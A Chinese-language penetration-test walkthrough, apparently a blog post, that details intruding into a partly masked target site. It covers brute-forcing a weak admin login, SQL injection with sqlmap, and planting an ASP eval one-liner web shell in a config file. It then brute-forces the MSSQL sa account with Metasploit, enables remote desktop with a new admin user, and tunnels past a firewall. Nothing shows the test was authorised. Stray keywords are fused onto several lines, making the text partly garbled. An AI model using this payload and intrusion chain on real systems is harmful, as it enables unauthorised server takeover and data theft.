一次完整的滲透測試

目標網站:39.xxx.xxx.xxxhtml

 

 一階段前臺測試:sql

一、前臺存在登錄入口且無驗證碼(確定要暴力破解啊)shell

二、前臺url參數處加敏感字符數據庫報錯存在sql注入數據庫

三、前臺登錄處輸入危險字符,數據庫報錯存在post注入緩存

測試結果以下:
cookie

暴力破解得到xss

用戶名:admin編輯器

密碼:123456post

 

 

 

 

利用sqlmap跑注入並無跑出任何數據測試

只能登錄看一下了

 

 

2、登錄前臺測試

利用前臺的會員登錄發現有使用第三方編輯器(並無找到可利用漏洞)

存在xss漏洞

存在sql注入漏洞

 

 

 

 

 

 

 

 

 

 

 

 在登錄的狀態下繼續進行sql注入(burp  copyto file )發現跑出來一個表

 

 

 

 

 

 

 只跑出了當前帳戶和一個同級帳戶

到這裏看了眼後臺仍是一臉懵逼

 

 

 

3、黑盒已經很差搞了,下載同類CMS

搭建環境擼一把

把相同源碼cms數據庫表名

將對應代表加入sqlmap庫中

路徑:sqlmap/txt/common-tables.txt

(表名必定要放前邊放最後要跑一年的)

繼續sqlmap跑、

 

 

 

 成功進入後臺

 

4、getshell


進入後臺以後發現編輯器兩個

文件上傳白名單,試了好久,基本行不通了

後臺依舊存在XSS漏洞(這裏的XSS能夠利用拿到後臺管理員cookie)

 

 

 搞了半天發現又遇到瓶頸了

再去擼一把源碼

發現當更新緩存的時候,根目錄下多了一個HTML文件修改html文件後發現報錯

在後臺參數配置處修改配置發現報錯

審查代碼發現代碼漏洞

 

anxinMall.basic.asp是一個ASP文件考慮寫入一句話

本地構造payload(這裏隨便改點東西網站就癱了若是在目標網站那確定涼涼了)

"%> <%eval request ("pass")%> <%'

 

 

菜刀鏈接、

 

 

 

 5、提權、

 nmap掃描發現目標開放1433端口

msf對1433端口sa進行爆破

 

爆破成功

mssql帳號和密碼爲:sa /123456

使用msf命令執行模塊,執行最終的dos命令

use auxiliary/admin/mssql/mssql_exec

開啓3389端口而且創建管理用戶之後

利用HTTP隧道進行鏈接3389(繞過防火牆)

詳細方法見下面的網址

https://www.cnblogs.com/xiaoyunxiaogang/p/10939485.html

另外能夠

經過MSFVenom生成exe後門木馬拿shell

相關文章
相關標籤/搜索